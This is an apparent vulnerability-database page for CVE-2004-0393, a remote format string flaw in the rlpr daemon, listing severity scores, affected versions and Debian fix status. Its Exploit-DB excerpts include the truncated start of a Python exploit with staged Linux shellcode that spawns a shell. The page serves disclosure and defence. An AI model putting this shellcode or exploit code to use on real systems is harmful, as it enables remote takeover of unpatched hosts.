CVE-2004-0393
published 2004-12-06CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in…
PriorityP352critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
17.43%
96.7th percentile
Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | rlpr | < rlpr 2.02-7.1 (bookworm) | rlpr 2.02-7.1 (bookworm) |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | — | — |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
| rlpr | rlpr | >= 0 < 2.02-7.1 | 2.02-7.1 |
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mjcj-xgcf-w8x7: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
ghsa_unreviewed·2022-04-29
CVE-2004-0393 [HIGH] GHSA-mjcj-xgcf-w8x7: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.
OSV
CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
osv·2004-12-06·CVSS 10.0
CVE-2004-0393 [CRITICAL] CVE-2004-0393: Format string vulnerability in the msg function for rlpr daemon (rlprd) 2
Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.
Debian
CVE-2004-0393: rlpr - Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 al...
vendor_debian·2004·CVSS 10.0
CVE-2004-0393 [CRITICAL] CVE-2004-0393: rlpr - Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 al...
Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.
Scope: local
bookworm: resolved (fixed in 2.02-7.1)
bullseye: resolved (fixed in 2.02-7.1)
forky: resolved (fixed in 2.02-7.1)
sid: resolved (fixed in 2.02-7.1)
trixie: resolved (fixed in 2.02-7.1)
No detection rules found.
Exploit-DB
Rlpr 2.04 - 'msg()' Remote Format String
exploitdb·2004-06-25
CVE-2004-0393 Rlpr 2.04 - 'msg()' Remote Format String
Rlpr 2.04 - 'msg()' Remote Format String
---
# by jaguar
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib
class rlprd:
fd = None
pad = 2
#00000000 31DB xor ebx,ebx
#00000002 F7E3 mul ebx
#00000004 B003 mov al,0x3
#00000006 80C304 add bl,0x4
#00000009 89E1 mov ecx,esp
#0000000B 4A dec edx
#0000000C CC int3
#0000000D CD80 int 0x80
#0000000F FFE1 jmp ecx
# read(4, esp, -1); jmp ecx
lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
# dup2 shellcode(4->0,1,2)
lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
# execute /bin/sh
lnx_stage_two += "\x90" * 100
lnx_stage_two += "\x31\xd2\x52\x68\x6
Exploit-DB
Rlpr 2.0 - 'msg()' Multiple Vulnerabilities
exploitdb·2004-06-19
CVE-2004-0393 Rlpr 2.0 - 'msg()' Multiple Vulnerabilities
Rlpr 2.0 - 'msg()' Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/10578/info
It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.
The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.
The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer.
rlpr versions 2.04 and prior are affected by these issues.
#!/usr/bin/python
import os, sys, socket, struct, time, telnetli
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=108810992313652&w=2http://www.debian.org/security/2004/dsa-524http://www.securityfocus.com/bid/10578https://exchange.xforce.ibmcloud.com/vulnerabilities/16453http://marc.info/?l=bugtraq&m=108810992313652&w=2http://www.debian.org/security/2004/dsa-524http://www.securityfocus.com/bid/10578https://exchange.xforce.ibmcloud.com/vulnerabilities/16453
2004-12-06
Published